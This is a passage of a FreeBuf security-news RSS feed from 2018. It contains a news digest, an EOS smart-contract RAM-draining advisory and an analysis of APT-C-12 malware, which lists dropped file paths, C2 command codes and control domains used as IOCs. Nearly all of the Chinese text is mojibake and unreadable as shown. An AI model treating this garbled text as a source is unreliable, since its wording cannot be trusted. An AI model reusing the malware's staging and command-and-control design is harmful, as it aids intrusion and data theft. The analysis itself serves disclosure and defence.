813<p style="text-align: center;"><b><b style="color: rgb(0, 176, 80);"><span style="font-size: 15px; color: rgb(239, 71, 71);">安全资讯早知é“,两分钟å¬å®Œæœ€æ–°å®‰å…¨å¿«è®¯~</span><br /></b></b></p>
814<p><b></b></p>
815<p style="text-align: center;"><b> <embed src="//music.163.com/outchain/player?type=3&id=1370327358&auto=0&height=66" width="330" height="110"> </b> </p>
816<p style="text-align: center;"><span style="font-size: 16px;"><span style="font-size: 16px;"><span style="font-size: 16px;"><span style="font-size: 16px;"><span style="font-size: 16px;"><img alt="æ—©é¤" src="http://image.3001.net/images/20180725/15325042064703.jpg!small" width="690" height="401"></span></span> </span> </span> </span></p>
817<p><span style="font-size: 16px;">以下请看详细内容:</span></p>
818<h3>åŠ å¯†æ¼æ´žå½±å“大é‡è“牙实现,主æµåŽ‚å•†è®¾å¤‡éƒ½å—å½±å“</h3>
819<p>近日,大é‡è“牙设备和系统被æ›å˜åœ¨ä¸¥é‡åŠ å¯†æ¼æ´ž CVE-2018-5383ï¼Œæ¼æ´žä¸»è¦æ˜¯å› 为支æŒè“ç‰™çš„è®¾å¤‡æ— æ³•å……åˆ†éªŒè¯â€œå®‰å…¨â€è“ç‰™è¿žæŽ¥æœŸé—´ä½¿ç”¨çš„åŠ å¯†å‚æ•°ã€‚这会导致é…对å‡å¼±å¹¶å¯¼è‡´è¿œç¨‹æ”»å‡»è€…获å–è®¾å¤‡ä½¿ç”¨çš„åŠ å¯†å¯†é’¥ï¼Œå¹¶æ¢å¤â€œå®‰å…¨â€è“牙连接ä¸çš„两个设备之间å‘é€çš„æ•°æ®ã€‚</p>
820<p style="text-align: center;"><img alt="è“牙.png" src="http://image.3001.net/images/20180725/15325042786020.png!small" width="690" height="248"></p>
821<p>ç›®å‰ï¼Œè‹¹æžœã€åšé€šã€è‹±ç‰¹å°”ã€é«˜é€šç‰å¤šå®¶ç¡¬ä»¶åŽ‚å•†éƒ½ç¡®è®¤å…¶è“牙实现和æ“作系统驱动都å—到影å“,苹果ã€åšé€šå’Œè‹±ç‰¹å°”å·²ç»å‘布了修å¤è¡¥ä¸ã€‚[æ¥æºï¼š<a href="https://www.bleepingcomputer.com/news/security/many-bluetooth-implementations-and-os-drivers-affected-by-crypto-bug/">bleepingcomputer</a>]</p>
822<h3>电å邮件网络攻击急剧上å‡ï¼Œé‚®ä»¶å®‰å…¨é£Žé™©å¢žå¤§</h3>
823<p>ç½‘ç»œå®‰å…¨å…¬å¸ Mimecast 近期å‘布了《2018 邮件安全现状》报告,报告显示,攻击者æŒç»é’ˆå¯¹ç»ˆç«¯ç”¨æˆ·å‘èµ·é‚®ä»¶æ”»å‡»ï¼Œé‚®ä»¶æ”»å‡»æ•°é‡æ€¥å‰§ä¸Šå‡ã€‚在报告的å—访者ä¸ï¼Œå°†è¿‘ 40% çš„ C 端用户都认为自己所在公å¸çš„ CEO 是公å¸å®‰å…¨çš„薄弱环节;31% çš„ C ç«¯ç”¨æˆ·éƒ½æ›¾é€šè¿‡é‚®ä»¶ä¸æ…Žå°†æ•感数æ®å‘é€ç»™æ— 关人员。</p>
824<p style="text-align: center;"><img alt="邮件" src="http://image.3001.net/images/20180725/15325043055015.jpg!small" width="690" height="270"></p>
825<p>æ¤å¤–,2017 年有 92% 的勒索软件都是通过邮件分å‘ï¼Œé€ æˆäº†è¾ƒå¤§å±å®³ã€‚90% çš„ç»„ç»‡éƒ½è¡¨ç¤ºé‚®ä»¶é’“é±¼æ”»å‡»æ•°é‡æœ‰æ‰€å¢žé•¿ã€‚ä½†æ˜¯ï¼Œåªæœ‰ 11% çš„ä¼ä¸šä¸æ–培è®å‘˜å·¥è¯†åˆ«ç½‘络攻击,而52% çš„ä¼ä¸šæ¯å¹´åªç»„织一次培è®ã€‚Mimecast CEO 表示,电å邮件攻击æŒç»å¢žé•¿ï¼Œé™¤äº†å¸¸è§„的防御之外,ä¼ä¸šè¿˜éœ€è¦é‡‡å–其他应对措施æ¥ç¡®ä¿å®‰å…¨ã€‚[æ¥æºï¼š<a href="https://www.infosecurity-magazine.com/news/emailbased-attacks-a-growing-risk/">infosecurity</a>]</p>
826<h3>è°·æŒå¼•入物ç†å¯†é’¥åŽï¼Œ8.5 万雇员都没有å†è¢«æˆåŠŸé’“é±¼</h3>
827<p>安全åšå®¢ KrebsOnSecurity 报é“,Google 从 2017 å¹´åˆå¼€å§‹è¦æ±‚所有雇员使用物ç†å¯†é’¥æ›¿ä»£å¯†ç ,æ¤åŽè¯¥å…¬å¸ 8.5 万å雇员没有一ä½çš„å·¥ä½œç›¸å…³å¸æˆ·è¢«æˆåŠŸé’“é±¼ã€‚ç‰©ç†å®‰å…¨å¯†é’¥æ˜¯å»‰ä»·çš„ USB 设备,å¯ä½œä¸ºåŒé‡è®¤è¯ï¼ˆ2FAï¼‰çš„æ›¿ä»£ã€‚å½“ç”¨æˆ·ç™»å½•æ—¶ï¼Œæ—¢éœ€è¦æä¾›å¯†ç ï¼Œè¿˜éœ€è¦æä¾›ç§»åŠ¨è®¾å¤‡ç‰ç‰©ç†å®‰å…¨å¯†é’¥ã€‚</p>
828<p style="text-align: center;"><img alt="yubikey.png" src="http://image.3001.net/images/20180725/1532504362552.png!small" width="399" height="366.74826789838335"></p>
829<p>Google å‘言人称,物ç†å®‰å…¨å¯†é’¥æ˜¯è®¿é—® Google æ‰€æœ‰å¸æˆ·çš„基础,自推行物ç†å®‰å…¨å¯†é’¥ä»¥æ¥ï¼Œå…¬å¸å†…é›‡å‘˜æ²¡æœ‰å†æŠ¥å‘Šè¿‡è´¦å·è¢«æŽ¥ç®¡çš„问题。[æ¥æºï¼š<a href="https://krebsonsecurity.com/2018/07/google-security-keys-neutered-employee-phishing/">krebsonsecurity</a>】</p>
830<h3>é»‘å®¢åœ¨è™šå‡ HTTP 错误页é¢ä¸éšè—登陆页é¢ï¼ŒèŽ·å– webshell 用于攻击</h3>
831<p>å®‰å…¨ç ”ç©¶äººå‘˜å‘çŽ°ï¼Œé»‘å®¢åœ¨ä¼ªé€ çš„ HTTP 错误页é¢ä¸éšè—登录表å•ã€èŽ·å– webshell 访问æƒé™ç”¨äºŽæ”»å‡»çš„è¡Œä¸ºè¿‘æœŸæœ‰æ‰€å¢žåŠ ã€‚è¿™äº›é¡µé¢å‡è£…出现 HTTP 错误,例如 404 Not Found 或 Forbiddenï¼Œä½†å®žé™…ä¸Šå´æ˜¯ç™»å½•页é¢ï¼Œå…许攻击者访问 webshell 以在æœåŠ¡å™¨ä¸Šå‘出命令。</p>
832<p style="text-align: center;"><img alt="social-image-3.jpg" src="http://image.3001.net/images/20180725/15325044319579.jpg!small" width="690" height="276"></p>
833<p>利用 webshell,黑客å¯ä»¥ä¸Šä¼ æ¶æ„软件ã€ç½‘ç»œé’“é±¼è„šæœ¬æˆ–å…¶ä»–è½¯ä»¶ã€‚å¦‚æžœä¸æ…Žç‚¹å‡»åˆ°é¡µé¢ï¼Œå°±å¯èƒ½ä¸æ‹›ã€‚è¿™å¹¶éžæ˜¯ä¸€ç§æ–°çš„æ”»å‡»æŠ€æœ¯ï¼Œä½†è¿‘æ¥è¶Šæ¥è¶Šé¢‘ç¹ï¼Œå®¹æ˜“让ä¸ç†Ÿæ‚‰çš„人上当。[æ¥æºï¼š<a href="https://www.bleepingcomputer.com/news/security/hackers-hiding-web-shell-logins-in-fake-http-error-pages/">bleepingcomputer</a>]</p>
834<h3>APP <b>注销难引官媒关注,人民日报点评称è¦ä¿éšœä¿¡æ¯å®‰å…¨</b></h3>
835<p>近日,ä¸å›½é’年报社社会调查ä¸å¿ƒè”åˆé—®å·ç½‘,对 2002 åå—访者进行的一项调查显示,75.9% çš„å—访者é‡åˆ°è¿‡ APP è´¦å·é𾿳¨é”€çš„æƒ…况,62.9% çš„å—访者担心 APP è´¦å·æ³¨é”€éš¾ä¼šå¯¼è‡´è´¦å·è¢«ç›—用。目å‰ï¼Œå¾ˆå¤šåº”用软件商通过 APP 注册的形å¼èŽ·å–用户数æ®ï¼Œç„¶åŽå°†æ•°æ®å–出æ¥èŽ·å–æ”¶ç›Šï¼Œç»™ç”¨æˆ·é€ æˆç§ç§å›°æ‰°ã€‚</p>
836<p style="text-align: center;"><img alt="注销" src="http://image.3001.net/images/20180725/15325045954494.jpg!small" width="690" height="441.6"></p>
837<p>对于应用软件商而言,设置简å•的注销通é“在技术层é¢å¹¶ä¸éš¾ï¼Œä½†ä¸šå†…人士é€éœ²ï¼Œè¿™äº›è½¯ä»¶å•†å¹¶ä¸æ„¿æ„è®©ç”¨æˆ·æ³¨é”€ï¼Œè¿™æ ·ä»–ä»¬å°±èƒ½ä¿è¯è‡ªå·±æŽŒæ¡è¶Šæ¥è¶Šå¤šçš„用户数æ®ï¼Œç”¨äºŽå°†æ¥å˜çŽ°ã€‚äººæ°‘æ—¥æŠ¥æµ·å¤–ç‰ˆè®¤ä¸ºï¼ŒAPP è´¦å·æ³¨é”€éš¾çš„行为其实是对用户éšç§çš„ä¾µçŠ¯ã€‚å¯¹äºŽæ‹’ç»æ³¨é”€è´¦æˆ·çš„行为,《电信和互è”网用户个人信æ¯ä¿æŠ¤è§„定》和网络安全法都明确了惩戒举措,但从现状æ¥çœ‹ï¼Œæƒ©ç½šåŠ›åº¦æ˜Žæ˜¾ä¸å¤Ÿå¤§ã€‚未æ¥éœ€è¦æ›´ä¸¥åŽ‰çš„åº”å¯¹ä¸¾æŽªã€‚[æ¥æºï¼š<a href="http://it.people.com.cn/n1/2018/0723/c1009-30163179.html" target="_blank" ref="nofollow">人民网</a>]</p>
838<p><span style="color: rgb(159, 163, 168);"><b>*AngelaY 编译整ç†ï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ª FreeBuf.COM</b></span></p>
839]]></content:encoded>
840 <wfw:commentRss>http://www.freebuf.com/news/178730.html/feed</wfw:commentRss>
841 <slash:comments>2</slash:comments>
842 </item>
843 <item>
844 <title>è¦æƒ• | æ¶æ„EOSåˆçº¦å˜åœ¨åžå™¬ç”¨æˆ·RAM的安全风险</title>
845 <link>http://www.freebuf.com/vuls/178812.html</link>
846 <comments>http://www.freebuf.com/vuls/178812.html#comments</comments>
847 <pubDate>Wed, 25 Jul 2018 15:44:16 +0000</pubDate>
848 <dc:creator>美图安全应急å“应ä¸å¿ƒ</dc:creator>
849 <category><![CDATA[区å—链安全]]></category>
850 <category><![CDATA[æ¼æ´ž]]></category>
851 <category><![CDATA[EOS]]></category>
852 <category><![CDATA[RAM]]></category>
853
854 <guid isPermaLink="false">http://www.freebuf.com/?p=178812</guid>
855 <description><![CDATA[EOS,是专门为商用分布å¼åº”用而设计的一款高性能区å—链æ“ä½œç³»ç»Ÿï¼Œæ˜¯ä¸€ç§æ–°çš„区å—链架构,旨在实现分布å¼åº”用的高性能扩展。EOSçš„å‘布,被誉为区å—链3.0时代的到æ¥ã€‚ 类似于区å—链2.0æ—¶ä»£çš„ä»¥å¤ªåŠæŠ€æœ¯ï¼ŒEOSåŒæ ·æ”¯æŒéƒ¨ç½²å’Œè¿è¡Œæ™ºèƒ½åˆçº¦ã€‚EOS的智能åˆçº¦è™šæ‹ŸæœºåŸºäºŽWASM,å³Web Assembly,它是谷æŒã€è‹¹æžœã€å¾®è½¯ç‰ä¼—多公å¸åŒæ—¶æ”¯æŒçš„一ç§ä¸é—´ä»£ç (å—节ç ), 用于在æµè§ˆå™¨ä¸é«˜æ•ˆæ‰§è¡ŒåŽŸæœ¬javascript引擎执行的本地逻辑。常用è¯è¨€(c/c++ç‰)编写的程åºå¯ä»¥ç¼–译æˆwasmå—节ç ,也就是说EOS智能åˆçº¦å…¼å®¹æ‰€æœ‰ç”¨c, c++ç‰é«˜çº§è¯è¨€ç¼–写的程åºã€‚åŒæ—¶wasmå—èŠ‚ç æ—¢å¯ä»¥ç¼–è¯‘æˆæœºå™¨ç åŽæ‰§è¡Œï¼Œåˆå¯ä»¥ä½¿ç”¨è§£é‡Šå™¨ç›´æŽ¥æ‰§è¡Œ, 兼容性和性能兼顾。 在EOS智能åˆçº¦æ‰§è¡Œè¿‡ç¨‹ä¸ï¼Œéœ€è¦æ¶ˆè€—EOS节点的cpu和内å˜èµ„æºï¼Œè¿™äº›èµ„æºæŒ‰ç…§äº¤æ˜“å‘生时的CPU资æºå’ŒRAM资æºä»·æ ¼ï¼Œæ”¯ä»˜ç»™EOS节点,从å‰ä¸€æ®µæ—¶é—´è¢«çˆ†ç‚’çš„RAMä»·æ ¼å°±å¯ä»¥çœ‹åˆ°RAM的稀缺性。 æ¼æ´žå±å®³ 本次å‘çŽ°çš„æ¼æ´žï¼Œæ°å¥½ä¼šå¯¼è‡´ç”¨æˆ·è´¦æˆ·å†…çš„RAMå¯èƒ½è¢«æ¶æ„消耗,引å‘直接财产æŸå¤±ã€‚ æ¶æ„EOSåˆçº¦å˜åœ¨åžå™¬ç”¨æˆ·RAM的安全风险,需è¦å¼•èµ·å„大交易所ã€é’±åŒ…ã€token空投方ã€DAppã€ç”¨æˆ·ç‰çš„è¦æƒ•,é¿å…éå—æŸå¤±ã€‚ 披露过程 安全起è§ï¼Œæˆ‘们已ç»é€šçŸ¥blockone å’Œæ…¢é›¾ï¼Œæ¼æ´žç»†èŠ‚åŽç»å°†åœ¨ã€Œç¾Žå›¾åŒºå—链实验室ã€å…¬ä¼—å·ã€FreeBufåŠå…¶å®ƒåª’ä½“å¹³å°æŠ«éœ²ã€‚ 防御手段 相关项目方在åšè½¬è´¦æ“作时å¯é€šè¿‡å‘½ä»¤è¡Œ “cleos get code” 判æ–ç›®æ ‡åœ°å€æ˜¯å¦ä¸ºåˆçº¦åœ°å€ï¼Œé¿å…RAMè¢«æ¶æ„åžå™¬å¯¼è‡´æŸå¤±ã€‚ å¦å¤–在问题未解决之å‰ï¼Œå¯ä»¥å‡å°‘用æ¥è½¬è´¦çš„è´¦æˆ·æŒæœ‰çš„ RAM æ•°é‡ï¼Œå°½å¯èƒ½é¿å…éå—æŸå¤±ã€‚ 如å‘现转账过程ä¸RAM使用异常,å¯ä»¥ç¬¬ä¸€æ—¶é—´è”系我们:security@meitu.com。  美图区å—链实验室&美图安全应急å“应ä¸å¿ƒè”åˆå£°æ˜Ž *本文作者:美图应急å“应ä¸å¿ƒï¼Œè½¬è½½è¯·æ³¨æ˜Žæ¥è‡ªFreeBuf.COM]]></description>
856 <content:encoded><![CDATA[<p><span style="color: rgb(0, 176, 80);"><b>EOS,是专门为商用分布å¼åº”用而设计的一款高性能区å—链æ“ä½œç³»ç»Ÿï¼Œæ˜¯ä¸€ç§æ–°çš„区å—链架构,旨在实现分布å¼åº”用的高性能扩展。EOSçš„å‘布,被誉为区å—链3.0时代的到æ¥ã€‚</b></span></p>
857<p><span style="color: rgb(0, 176, 80);"><b><img alt="1.jpg" src="http://image.3001.net/images/20180725/15325326938295.jpg!small" width="690" height="386"></b></span></p>
858<p>类似于区å—链2.0æ—¶ä»£çš„ä»¥å¤ªåŠæŠ€æœ¯ï¼ŒEOSåŒæ ·æ”¯æŒéƒ¨ç½²å’Œè¿è¡Œæ™ºèƒ½åˆçº¦ã€‚EOS的智能åˆçº¦è™šæ‹ŸæœºåŸºäºŽWASM,å³Web Assembly,它是谷æŒã€è‹¹æžœã€å¾®è½¯ç‰ä¼—多公å¸åŒæ—¶æ”¯æŒçš„一ç§ä¸é—´ä»£ç (å—节ç ), 用于在æµè§ˆå™¨ä¸é«˜æ•ˆæ‰§è¡ŒåŽŸæœ¬javascript引擎执行的本地逻辑。常用è¯è¨€(c/c++ç‰)编写的程åºå¯ä»¥ç¼–译æˆwasmå—节ç ,也就是说EOS智能åˆçº¦å…¼å®¹æ‰€æœ‰ç”¨c, c++ç‰é«˜çº§è¯è¨€ç¼–写的程åºã€‚åŒæ—¶wasmå—èŠ‚ç æ—¢å¯ä»¥ç¼–è¯‘æˆæœºå™¨ç åŽæ‰§è¡Œï¼Œåˆå¯ä»¥ä½¿ç”¨è§£é‡Šå™¨ç›´æŽ¥æ‰§è¡Œ, 兼容性和性能兼顾。</p>
859<p>在EOS智能åˆçº¦æ‰§è¡Œè¿‡ç¨‹ä¸ï¼Œéœ€è¦æ¶ˆè€—EOS节点的cpu和内å˜èµ„æºï¼Œè¿™äº›èµ„æºæŒ‰ç…§äº¤æ˜“å‘生时的CPU资æºå’ŒRAM资æºä»·æ ¼ï¼Œæ”¯ä»˜ç»™EOS节点,从å‰ä¸€æ®µæ—¶é—´è¢«çˆ†ç‚’çš„RAMä»·æ ¼å°±å¯ä»¥çœ‹åˆ°RAM的稀缺性。</p>
860<h2>æ¼æ´žå±å®³</h2>
861<p><span style="color: rgb(239, 71, 71);"><b>本次å‘çŽ°çš„æ¼æ´žï¼Œæ°å¥½ä¼šå¯¼è‡´ç”¨æˆ·è´¦æˆ·å†…çš„RAMå¯èƒ½è¢«æ¶æ„消耗,引å‘直接财产æŸå¤±ã€‚</b></span></p>
862<p>æ¶æ„EOSåˆçº¦å˜åœ¨åžå™¬ç”¨æˆ·RAM的安全风险,需è¦å¼•èµ·å„大交易所ã€é’±åŒ…ã€token空投方ã€DAppã€ç”¨æˆ·ç‰çš„è¦æƒ•,é¿å…éå—æŸå¤±ã€‚</p>
863<h2>披露过程</h2>
864<p>安全起è§ï¼Œæˆ‘们已ç»é€šçŸ¥blockone å’Œæ…¢é›¾ï¼Œæ¼æ´žç»†èŠ‚åŽç»å°†åœ¨ã€Œç¾Žå›¾åŒºå—链实验室ã€å…¬ä¼—å·ã€FreeBufåŠå…¶å®ƒåª’ä½“å¹³å°æŠ«éœ²ã€‚</p>
865<h2>防御手段</h2>
866<p>相关项目方在åšè½¬è´¦æ“作时å¯é€šè¿‡å‘½ä»¤è¡Œ “cleos get code” 判æ–ç›®æ ‡åœ°å€æ˜¯å¦ä¸ºåˆçº¦åœ°å€ï¼Œé¿å…RAMè¢«æ¶æ„åžå™¬å¯¼è‡´æŸå¤±ã€‚</p>
867<p>å¦å¤–在问题未解决之å‰ï¼Œå¯ä»¥å‡å°‘用æ¥è½¬è´¦çš„è´¦æˆ·æŒæœ‰çš„ RAM æ•°é‡ï¼Œå°½å¯èƒ½é¿å…éå—æŸå¤±ã€‚</p>
868<p>如å‘现转账过程ä¸RAM使用异常,å¯ä»¥ç¬¬ä¸€æ—¶é—´è”系我们:<a href="mailto:security@meitu.com">security@meitu.com</a>。 </p>
869<p><span style="color: rgb(159, 163, 168);"><i>美图区å—链实验室&美图安全应急å“应ä¸å¿ƒè”åˆå£°æ˜Ž</i></span></p>
870<p><b style=""><span style="color: rgb(159, 163, 168);">*本文作者:美图应急å“应ä¸å¿ƒ</span></b><b style="color: rgb(159, 163, 168);">,转载请注明æ¥è‡ªFreeBuf.COM</b> </p>
871]]></content:encoded>
872 <wfw:commentRss>http://www.freebuf.com/vuls/178812.html/feed</wfw:commentRss>
873 <slash:comments>5</slash:comments>
874 </item>
875 <item>
876 <title>è“å®è‡(APT-C-12)æœ€æ–°æ”»å‡»æ ·æœ¬åŠC&C机制分æž</title>
877 <link>http://www.freebuf.com/articles/system/178422.html</link>
878 <comments>http://www.freebuf.com/articles/system/178422.html#comments</comments>
879 <pubDate>Wed, 25 Jul 2018 12:06:07 +0000</pubDate>
880 <dc:creator>360天眼实验室</dc:creator>
881 <category><![CDATA[系统安全]]></category>
882 <category><![CDATA[æ¶æ„文件]]></category>
883 <category><![CDATA[è“å®è‡]]></category>
884 <category><![CDATA[诱饵]]></category>
885
886 <guid isPermaLink="false">http://www.freebuf.com/?p=178422</guid>
887 <description><![CDATA[背景 ç»§360å…¬å¸æŠ«éœ²äº†è“å®è‡(APT-C-12)æ”»å‡»ç»„ç»‡çš„ç›¸å…³èƒŒæ™¯ä»¥åŠæ›´å¤šé’ˆå¯¹æ€§æ”»å‡»æŠ€æœ¯ç»†èŠ‚åŽï¼Œ360å¨èƒæƒ…报ä¸å¿ƒè¿‘期åˆç›‘æµ‹åˆ°è¯¥ç»„ç»‡å®žæ–½çš„æ–°çš„æ”»å‡»æ´»åŠ¨ï¼Œæœ¬æ–‡ç« æ˜¯å¯¹å…¶ç›¸å…³æŠ€æœ¯ç»†èŠ‚çš„è¯¦ç»†åˆ†æžã€‚ æ ·æœ¬åˆ†æž è¯±é¥µæ–‡ä»¶ 在APT-C-12组织近期的攻击活动ä¸ï¼Œå…¶ä½¿ç”¨äº†ä¼ªè£…戔ä¸å›½è½»å·¥ä¸šè”åˆä¼šæŠ•资现况与åˆä½œæ„å‘简介”的诱导文件,结åˆè¯¥ç»„织过去的攻击手法,该诱饵文件会éšé±¼å‰é‚®ä»¶è¿›è¡ŒæŠ•递。 å¦‚ä¸‹å›¾æ‰€ç¤ºè¯¥è¯±é¥µæ–‡ä»¶ä¼ªè£…æˆæ–‡ä»¶å¤¹çš„å›¾æ ‡ï¼Œæ‰§è¡ŒåŽä¼šæ‰“å¼€åŒ…å«æœ‰è¯±é¥µæ–‡æ¡£å’Œå›¾ç‰‡çš„æ–‡ä»¶å¤¹ï¼Œè€Œæ¤æ—¶å®žé™…çš„æ¶æ„è½½è·å·²ç»åœ¨åŽå°æ‰§è¡Œã€‚ 当该诱饵文件è¿è¡Œæ—¶ï¼Œå…¶ä¼šè§£å¯†é‡Šæ”¾4个文件,其ä¸ä¸¤ä¸ªä¸ºä¸Šè¿°çš„诱导文档和图片,å¦å¤–ä¸ºä¸¤ä¸ªæ¶æ„çš„tmp文件。 é‡Šæ”¾çš„æ¶æ„tmp文件路径为: %temp%\unicode32.tmp %appdata%\WinRAR\update.tmp 最åŽé€šè¿‡LoadLibraryWåŠ è½½é‡Šæ”¾çš„unicode32.tmp文件。 unicode32.tmp unicode32.tmp为一个loader,其主è¦ç”¨äºŽåŠ è½½update.tmp,如下图所示其通过rundll32.exeåŠ è½½update.tmp,并调用其导出函数jj。 å½“åŠ è½½äº†update.tmpåŽï¼Œä¼šåˆ 除装载exeç¨‹åºæ–‡ä»¶å’Œè‡ªèº«ã€‚ update.tmp 该文件为一个DLL,并有一个å为jj的导出函数。 å…¶é¦–å…ˆä¼šå¯¹ç›®æ ‡ä¸»æœºè¿›è¡Œä¿¡æ¯æ”¶é›†ã€‚ 获å–系统版本信æ¯ï¼š 调用CreateToolhelp32Snapshot获å–系统进程信æ¯ï¼š 调用GetAdaptersInfo获å–网å¡MAC地å€ï¼š 判æ–当å‰ç³»ç»ŸçŽ¯å¢ƒæ˜¯32使ˆ–64ä½ï¼š 通过注册表获å–已安装的程åºä¿¡æ¯ï¼ŒèŽ·å–的安装程åºä¿¡æ¯åŠ ä¸Šå‰ç¼€â€ISLâ€æ ¼å¼åŒ–: 通过注册表获å–DisplayNameå’ŒDisplayVersion的信æ¯ï¼Œå¹¶å°†DisplayName å’ŒDisplayVersionæ ¼å¼åŒ–为â€%sâ€:{“NDâ€:â€%sâ€,â€DVâ€:â€%sâ€}。 ä¿¡æ¯æ”¶é›†åŽä¼šé¦–å…ˆå‘远程控制æœåС噍å‘é€ä¸Šçº¿ä¿¡æ¯ã€‚ 获å–tmp目录, 创建AdobeNW目录,并从控制æœåŠ¡å™¨ä¸Šä¸‹è½½AdobeUpdate.tmp作为第二阶段的载è·ï¼Œå…¶å®žé™…为一个DLL文件。 最终调用rundll32å¯åЍDLL文件的导出函数MainFun,如果进程创建æˆåŠŸç»™æœåŠ¡å™¨è¿”å›žä¿¡æ¯ã€‚ AdobeUpdate.tmp AdobeUpdate.tmp为DLL文件,其导出方法MainFun由第一阶段木马DLL调用执行。 其首先é历%USERPROFILE%\AppData路径下tmpåŽç¼€æ–‡ä»¶ï¼Œå¹¶åˆ 除。 ç„¶åŽä»Žæ–‡ä»¶è‡ªèº«å°¾éƒ¨è¯»å–é…置信æ¯å¹¶è§£å¯†ï¼Œå…¶æ ¼å¼å¦‚下: åŠ å¯†çš„é…置信æ¯ï¼ŒåŒ…æ‹¬æ ‡è¯†ID,控制æœåŠ¡å™¨åœ°å€ï¼ŒåР坆IVå’ŒKEY,以åŠMutexä¿¡æ¯ï¼› 4å—èŠ‚åŠ å¯†é…置信æ¯é•¿åº¦ï¼› 17å—节解密密钥; 例如上图所示的解密é…置文件的KEY为sobcsnkciatwiffi,其解密算法如下: 解密之åŽçš„é…置文件如下所示: 查询HKEY_CURRENT_USER下的MyAppæ³¨å†Œè¡¨æŸ¥çœ‹æ˜¯å¦æœ‰FirstExec, 通过å—符串â€noâ€æ¥åˆ¤æ–该DLLæ˜¯å¦æ˜¯ç¬¬ä¸€æ¬¡æ‰§è¡Œã€‚ è‹¥DLLä¸ä¸ºé¦–æ¬¡æ‰§è¡Œï¼Œåˆ™è½®è¯¢èŽ·å–æŽ§åˆ¶æœåŠ¡å™¨å‘½ä»¤ï¼Œå¦åˆ™é历ç£ç›˜C:到F:ä¸çš„æ–‡æ¡£æ–‡ä»¶ä¿¡æ¯ï¼Œå¹¶ä¿å˜åœ¨temp文件夹下的list_tmp.txtä¸ã€‚ 其䏿Ÿ¥æ‰¾çš„æ–‡æ¡£ç±»åž‹åŒ…括.ppt .pptx .pdf.xls .xlsx .doc .docx .txt .wps .rtf的文档,将文档文件路径ã€åˆ›å»ºæ—¶é—´ä»¥åŠæ–‡ä»¶å¤§å°ä¿¡æ¯è¿›è¡Œä¿å˜ã€‚ ä¸‹å›¾ä¸ºç¤ºä¾‹çš„å†™å…¥æ•°æ®æ ¼å¼(文件路径 创建时间文件大å°): å¹¶å°†list_tmp.txt进行aesåŠ å¯†åŽä¸Šä¼ 到控制æœåŠ¡å™¨ï¼š 接ç€è®¾ç½®æ³¨å†Œè¡¨FirstExecæ ‡å¿—ï¼š AdobeUpdate.dll木马实现了丰富的命令控制指令,其通过访问控制域å获å–åŒ…å«æœ‰æŽ§åˆ¶å‘½ä»¤çš„æ–‡ä»¶ï¼Œå¹¶åœ¨æœ¬åœ°è§£å¯†è§£æžåŽæ‰§è¡Œã€‚ 其指令以***和对应指令数å—组æˆï¼Œä»¥ä¸‹ä¸ºæŽ§åˆ¶æŒ‡ä»¤åŠŸèƒ½åˆ—è¡¨ï¼š ***1 执行cmd命令 ***2 æ›´æ–°AppNameé…ç½® ***3 æ–‡ä»¶ä¸Šä¼ ***4 文件下载 ***5 更新控制域å ***7 ä¸Šä¼ æ–‡æ¡£æ–‡ä»¶åˆ—è¡¨ä¿¡æ¯ ***8 执行dll文件或exe ***9 æ–‡ä»¶åˆ é™¤ ***10 指定文件列表信æ¯ä¸Šä¼ ***11 ä¿ç•™ 控制基础设施 APT-C-12组织近期活动ä¸ä½¿ç”¨çš„æ¶æ„代ç 利用了applinzi.com域å下的二级域å作为控制域å,该域å为Sina App Engine的云æœåŠ¡æ‰˜ç®¡ã€‚ 我们测试注册了SAE的账户,其默认创建应用å¯ä»¥å…费使用å多天,并支æŒå¤šç§å¼€å‘è¯è¨€çš„环境部署。 我们å°è¯•对其控制æœåŠ¡å™¨è¿›è¡Œè¿žæŽ¥ï¼Œä½†å…¶åŽå°å¤„ç†ç¨‹åºå·²ç»å‡ºé”™ï¼Œé€šè¿‡è¿”å›žçš„é”™è¯¯ä¿¡æ¯æˆ‘们å¯ä»¥å‘现该组织使用Python部署的åŽå°åº”用,并使用了flask作为其WebæœåŠ¡å®žçŽ°ã€‚ SAE控制åè®® 该组织针对SAE的部署应用实现了一套访问å议,其分为put,info,get,del四个功能。 å…¶ä¸putç”¨äºŽä¸Šä¼ æ–‡ä»¶ï¼š getç”¨äºŽèŽ·å–æ–‡ä»¶ï¼š info用于获å–ä¿¡æ¯ï¼š delç”¨äºŽåˆ é™¤æ–‡ä»¶ï¼š 总结 ç»§360å¨èƒæƒ…报ä¸å¿ƒå‘现该组织利用Digital Ocean云æœåŠ¡ä½œä¸ºå‘½ä»¤æŽ§åˆ¶å’Œå›žä¼ é€šä¿¡æ¸ é“以åŽï¼Œæˆ‘们åˆå‘现该组织使用国内的云æœåŠ¡SAEæž„å»ºå…¶æŽ§åˆ¶å›žä¼ åŸºç¡€è®¾æ–½ï¼Œåˆ©ç”¨è¿™ç§æ–¹å¼ä¸€å®šç¨‹åº¦ä¸Šå‡å°‘äº†æ”»å‡»åˆ©ç”¨çš„æˆæœ¬ï¼Œä¹Ÿå¢žåŠ äº†åˆ†æžå›žæº¯çš„难度。 IOC crecg.applinzi.com costbank.applinzi.com å‚考链接 https://sae.sina.com.cn/ 原文链接: https://ti.360.net/blog/articles/latest-sample-and-c2-mechanism-of-apt-c-12/ *本文作者:360天眼实验室,转载请注明æ¥è‡ªFreeBuf.COM]]></description>
888 <content:encoded><![CDATA[<h2>背景<br /></h2>
889<p><b style="color: rgb(0, 176, 80);"> ç»§360å…¬å¸æŠ«éœ²äº†è“å®è‡(APT-C-12)æ”»å‡»ç»„ç»‡çš„ç›¸å…³èƒŒæ™¯ä»¥åŠæ›´å¤šé’ˆå¯¹æ€§æ”»å‡»æŠ€æœ¯ç»†èŠ‚åŽï¼Œ360å¨èƒæƒ…报ä¸å¿ƒè¿‘期åˆç›‘æµ‹åˆ°è¯¥ç»„ç»‡å®žæ–½çš„æ–°çš„æ”»å‡»æ´»åŠ¨ï¼Œæœ¬æ–‡ç« æ˜¯å¯¹å…¶ç›¸å…³æŠ€æœ¯ç»†èŠ‚çš„è¯¦ç»†åˆ†æžã€‚</b></p>
890<h2>æ ·æœ¬åˆ†æž</h2>
891<h3>诱饵文件</h3>
892<p> 在APT-C-12组织近期的攻击活动ä¸ï¼Œå…¶ä½¿ç”¨äº†ä¼ªè£…戔ä¸å›½è½»å·¥ä¸šè”åˆä¼šæŠ•资现况与åˆä½œæ„å‘简介”的诱导文件,结åˆè¯¥ç»„织过去的攻击手法,该诱饵文件会éšé±¼å‰é‚®ä»¶è¿›è¡ŒæŠ•递。</p>
